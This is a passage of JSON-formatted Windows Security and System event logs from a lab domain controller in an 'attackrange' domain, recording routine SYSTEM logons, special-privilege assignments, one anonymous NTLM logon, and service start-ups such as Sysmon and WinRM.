Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220281,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220282,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220283,"ProcessID":864,"ThreadID":104,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220284,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220285,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"SYSTEM","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e7","PrivilegeList":"SeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220286,"ProcessID":864,"ThreadID":916,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tNo\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-7\r\n\tAccount Name:\t\tANONYMOUS LOGON\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x2C10D\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x0\r\n\tProcess Name:\t\t-\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tNtLmSsp \r\n\tAuthentication Package:\tNTLM\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\tNTLM V1\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-7","TargetUserName":"ANONYMOUS LOGON","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x2c10d","LogonType":"3","LogonProcessName":"NtLmSsp ","AuthenticationPackageName":"NTLM","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"NTLM V1","KeyLength":"0","ProcessName":"-","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1843","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76810,"ProcessID":856,"ThreadID":2592,"Channel":"System","Message":"The PcaSvc service entered the running state.","param1":"PcaSvc","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76811,"ProcessID":856,"ThreadID":2592,"Channel":"System","Message":"The Dfs service entered the running state.","param1":"Dfs","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76812,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The AWSLiteAgent service entered the running state.","param1":"AWSLiteAgent","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76813,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The IsmServ service entered the running state.","param1":"IsmServ","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76814,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The WpnService service entered the running state.","param1":"WpnService","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76815,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The EFS service entered the running state.","param1":"EFS","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:23","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76816,"ProcessID":856,"ThreadID":1124,"Channel":"System","Message":"The DFSR service entered the running state.","param1":"DFSR","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76817,"ProcessID":856,"ThreadID":1120,"Channel":"System","Message":"The sysmon64 service entered the running state.","param1":"sysmon64","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76818,"ProcessID":856,"ThreadID":1120,"Channel":"System","Message":"The WinRM service entered the running state.","param1":"WinRM","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76819,"ProcessID":856,"ThreadID":1120,"Channel":"System","Message":"The StateRepository service entered the running state.","param1":"StateRepository","param2":"running","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220287,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tWIN-DC-6178966$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E7\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t5\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x358\r\n\tProcess Name:\t\tC:\\Windows\\System32\\services.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\t-\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-18","SubjectUserName":"WIN-DC-6178966$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e7","TargetUserSid":"S-1-5-18","TargetUserName":"SYSTEM","TargetDomainName":"NT AUTHORITY","TargetLogonId":"0x3e7","LogonType":"5","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"-","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\services.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220288,"ProcessID":864,"ThreadID":904,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tSYSTEM\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E7\r\n\r\nPrivileges:\t\tSeAssignPrimaryTokenPrivilege\r\n\t\t\tSeTcbPrivilege\r\n\t\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeAuditPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special 